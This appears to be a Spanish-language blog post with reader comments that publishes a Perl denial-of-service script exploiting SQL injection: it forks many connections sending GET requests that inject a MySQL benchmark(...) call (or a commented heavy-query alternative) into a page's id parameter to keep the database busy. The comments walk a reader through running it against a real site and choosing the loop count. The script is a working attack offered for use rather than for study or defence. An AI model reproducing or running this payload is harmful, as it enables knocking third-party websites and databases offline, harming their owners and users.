Lo que hacemos es atacar de forma parecida al que se realiza en Time-Based Blind SQL. Pero en este caso forzamos al motor a realizar un delay constantemente.
Aqui esta el script hecho en perl
- · #!/usr/bin/perl
- · use IO::Socket;
- · if (!@ARGV[2]){
- · print "======================================================= \n";
- · print " Denial of Service MySQL injection V 1.0by MagnoBalt \n\n";
- · print " use perl $0 www.pagina.com.ar /noticia.php?id=45\n\n";
- · print "======================================================= \n";
- · exit(0);
- · }
- ·
- · $host=$ARGV[0];
- · $path=$ARGV[1];
- · #$injeccion="+and+(select+count(*)+from+information_schema.columns, +information_schema.columns+T1,
+information_schema.tables+T2)" ;
- · $injeccion="+and benchmark(99999999999999,md5(0x6b616f78))";
- · for($i = 1; $i < $ARGV[2] ; $i++) {
- · $pid = fork();
- · $socket = new IO::Socket::INET(
- · PeerAddr => $host,
- · PeerPort => 'http(80)',
- · Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
- · print $socket "GET " .$path.$injeccion. " HTTP/1.0\r\n";
- · print $socket "HOST:$host\r\n";
- · print $socket "\n\n";
- · print "*";
- · }
nota: La linea 13 esta comentada, si quieren provocar el delay con la tecnica "Blind Heavy Query" descomentenla y comenten la linea 14 que es usando la funcion Benchmark.
Dejo el link de otro mismo script pero hecho en php por OzX . Link
Saludos.
Hola Caeruleus, lo que te pase aqui, que es donde me lo pusiste
ResponderEliminarhttp://pastebin.lugmen.org.ar/5604
Es Normal si te fijaras en el codigo que el script pide 3 parametros, uno es el host, otra es el path y otro es la cota superior del for ARGV[3]. xD. Y tu solo estas pasando uno tienes que separar el host con la path.
Pruebalo asi
perl magno.pl http://www.xxxxxxx.cl /noticias.php?id=7 80
Gracias espero que si alguien tiene el problema similar le sea util este problema..
Saludos
xD, si me di cuenta de eso jaja. Por eso en el pastebin que te pase, está de las dos formas que probe. Primero separando la url del path, y segundo todo junto
ResponderEliminarAh, ya sé que bolu, también hay que pasar el puerto cierto? Eso era lo q m faltaba :P.
ResponderEliminarIgualmente me dice q no se puede conectar jaja
Hola Caeruleus, no el puerto no es, el 80 es la cantidad de ciclos q tendra la inyeccion sumnado la funcion fork. Aconsejo no poner un numero muy grande por ejemplo 400. por que consumira toda la memoria local.. Avisame o agregame al msn a mi correo. magnobalt@gmail.com. ahora ando medio perdido por las vacaas.. Un saludo..
ResponderEliminar